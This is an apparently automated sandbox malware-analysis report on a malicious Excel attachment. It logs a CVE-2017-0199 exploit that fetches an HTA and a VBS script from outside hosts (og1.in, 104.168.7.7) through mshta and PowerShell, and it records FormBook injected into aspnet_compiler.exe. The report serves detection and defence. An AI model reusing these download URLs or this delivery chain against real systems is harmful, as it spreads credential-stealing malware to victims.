          Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 104.168.7.7:80
          Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 104.168.7.7:80 -> 192.168.2.22:49166
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: global trafficHTTP traffic detected: GET /Ts9zje HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Ts9zje HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /356/ce/IEnetbookupdateion.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.7Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /356/ce/IEnetbookupdateion.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 104.168.7.7If-Range: "1cecc-6234bd0fe5c83"
          Source: global trafficHTTP traffic detected: GET /356/IEnetbookupdation.vbs HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.7Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.7.7
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899C7018 URLDownloadToFileW,7_2_000007FE899C7018
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6ACC71F0.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /Ts9zje HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Ts9zje HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /356/ce/IEnetbookupdateion.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.7Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /356/ce/IEnetbookupdateion.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 104.168.7.7If-Range: "1cecc-6234bd0fe5c83"
          Source: global trafficHTTP traffic detected: GET /356/IEnetbookupdation.vbs HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.7.7Connection: Keep-Alive
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: global trafficDNS traffic detected: DNS query: og1.in
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.7/
          Source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.7/356/IEnetbook
          Source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.7/356/IEnetbookupdation.vbs
          Source: powershell.exe, 00000007.00000002.520144813.000000001A772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.7/356/IEnetbookupdation.vbsiptor
          Source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.7/356/IEnetbookupdation.vbsp
          Source: mshta.exe, 00000004.00000003.487027748.0000000000321000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486739919.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486308977.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486308977.0000000000321000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000321000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487027748.0000000000366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.hta
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.hta...Sm
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htac
          Source: mshta.exe, 00000004.00000003.487358638.0000000002F65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htahttp://104.168.7.7/356/ce/IEnetbookupdateion.htaP
          Source: mshta.exe, 00000004.00000003.486739919.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htase
          Source: mshta.exe, 00000004.00000003.486739919.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htattingsk
          Source: mshta.exe, 00000004.00000003.487027748.0000000000321000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htawwC:
          Source: mshta.exe, 00000004.00000003.486308977.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487027748.0000000000366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.168.7.7/356/ce/IEnetbookupdateion.htaxo
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C270000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520144813.000000001A772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
          Source: powershell.exe, 00000007.00000002.520144813.000000001A7A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
          Source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
          Source: powershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
          Source: powershell.exe, 00000007.00000002.517798504.00000000024B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
          Source: powershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000007.00000002.519824388.00000000124E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.486308977.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487027748.0000000000366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/
          Source: mshta.exe, 00000004.00000002.487716458.00000000002EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.000000000034B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/Ts9zje
          Source: mshta.exe, 00000004.00000002.487716458.00000000002EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/Ts9zje#
          Source: mshta.exe, 00000004.00000003.486739919.00000000036FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/Ts9zje.htalicy
          Source: mshta.exe, 00000004.00000002.487716458.00000000002EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/Ts9zjeI5
          Source: mshta.exe, 00000004.00000003.486308977.0000000000321000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/Ts9zjeS
          Source: mshta.exe, 00000004.00000002.487716458.00000000002EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/Ts9zjet5
          Source: mshta.exe, 00000004.00000003.486308977.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487744371.0000000000366000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.487027748.0000000000366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://og1.in/X
          Source: mshta.exe, 00000004.00000003.486739919.00000000036B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.487937882.00000000036BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C270000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2ED000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.520478891.000000001C2D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
          Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
          Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
          Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49167 version: TLS 1.2
          Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Excel sheet contains many unusual embedded objects
          Source: PI#0034250924.xla.xlsxOLE: Microsoft Excel 2007+
          Source: F7A30000.0.drOLE: Microsoft Excel 2007+
          Microsoft Office drops suspicious files
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetbookupdateion[1].htaJump to behavior
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\ProgIDJump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0042BDA3 NtClose,13_2_0042BDA3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A607AC NtCreateMutant,LdrInitializeThunk,13_2_00A607AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5F9F0 NtClose,LdrInitializeThunk,13_2_00A5F9F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FAE8 NtQueryInformationProcess,LdrInitializeThunk,13_2_00A5FAE8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FB68 NtFreeVirtualMemory,LdrInitializeThunk,13_2_00A5FB68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FDC0 NtQuerySystemInformation,LdrInitializeThunk,13_2_00A5FDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A600C4 NtCreateFile,13_2_00A600C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A60060 NtQuerySection,13_2_00A60060
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A60078 NtResumeThread,13_2_00A60078
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A60048 NtProtectVirtualMemory,13_2_00A60048
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A601D4 NtSetValueKey,13_2_00A601D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A6010C NtOpenDirectoryObject,13_2_00A6010C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A60C40 NtGetContextThread,13_2_00A60C40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A610D0 NtOpenProcessToken,13_2_00A610D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A61148 NtOpenThread,13_2_00A61148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5F8CC NtWaitForSingleObject,13_2_00A5F8CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A61930 NtSetContextThread,13_2_00A61930
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5F938 NtWriteFile,13_2_00A5F938
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5F900 NtReadFile,13_2_00A5F900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FAB8 NtQueryValueKey,13_2_00A5FAB8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FAD0 NtAllocateVirtualMemory,13_2_00A5FAD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FA20 NtQueryInformationFile,13_2_00A5FA20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FA50 NtEnumerateValueKey,13_2_00A5FA50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00A5FBB8 NtQueryInformationToken,13_2_00A5FBB8
